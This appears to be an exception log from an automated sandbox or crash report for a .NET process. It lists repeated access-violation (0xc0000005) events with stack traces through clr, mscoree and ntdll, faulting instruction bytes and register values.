__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x537c78 0x537bad 0x5336da 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x537d11 registers.esp: 3862044 registers.edi: 41655340 registers.eax: 0 registers.ebp: 3862068 registers.edx: 7838160 registers.ebx: 41655360 registers.esi: 41656160 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x53efc1 0x53ef3b 0x53e69f 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 f6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53f23c registers.esp: 3861456 registers.edi: 45127968 registers.eax: 42916684 registers.ebp: 3861516 registers.edx: 0 registers.ebx: 41835684 registers.esi: 42916684 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x53efc1 0x53ef58 0x53e69f 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 f6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53f23c registers.esp: 3861456 registers.edi: 41835036 registers.eax: 44346700 registers.ebp: 3861516 registers.edx: 0 registers.ebx: 43126660 registers.esi: 44346700 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x53efc1 0x53ef58 0x53e69f 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 f6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53f23c registers.esp: 3861456 registers.edi: 41835036 registers.eax: 46059364 registers.ebp: 3861516 registers.edx: 0 registers.ebx: 44556608 registers.esi: 46059364 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb17d9 0x53eace 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1a23 registers.esp: 3861472 registers.edi: 41835036 registers.eax: 47615544 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 46395488 registers.esi: 47615544 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb17d9 0x53eace 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1a23 registers.esp: 3861472 registers.edi: 41835036 registers.eax: 42485144 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 41885320 registers.esi: 42485144 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb17d9 0x53eace 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1a23 registers.esp: 3861472 registers.edi: 41816048 registers.eax: 43834844 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 42614788 registers.esi: 43834844 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1aa9 0x53eb94 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1c81 registers.esp: 3861472 registers.edi: 41816048 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 43964560 registers.esi: 45184608 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1aa9 0x53eb94 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1c81 registers.esp: 3861472 registers.edi: 41816048 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 42298624 registers.esi: 42510876 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1aa9 0x53eb94 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1c81 registers.esp: 3861472 registers.edi: 41816048 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 42779764 registers.esi: 43999812 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1dd9 0x53ec36 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1faa registers.esp: 3861472 registers.edi: 45754096 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 44268780 registers.esi: 45488828 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1dd9 0x53ec36 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1faa registers.esp: 3861472 registers.edi: 45754096 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 45760048 registers.esi: 46980096 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb1dd9 0x53ec36 0x53dfa4 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb1faa registers.esp: 3861472 registers.edi: 45754096 registers.eax: 0 registers.ebp: 3861524 registers.edx: 0 registers.ebx: 47251316 registers.esi: 48471364 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xbb2364 0x53dfbc 0x537f10 0x5336ff 0x533386 0x531b93 0x531b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 98 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbb279a registers.esp: 3861932 registers.edi: 42534372 registers.eax: 0 registers.ebp: 3861976 registers.edx: 0 registers.ebx: 42528164 registers.esi: 42535056 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6f7800 0x6f7735 0x6f347b 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6f7899 registers.esp: 3600972 registers.edi: 38817624 registers.eax: 0 registers.ebp: 3600996 registers.edx: 5324168 registers.ebx: 38817644 registers.esi: 38818444 registers.ecx: 0	1
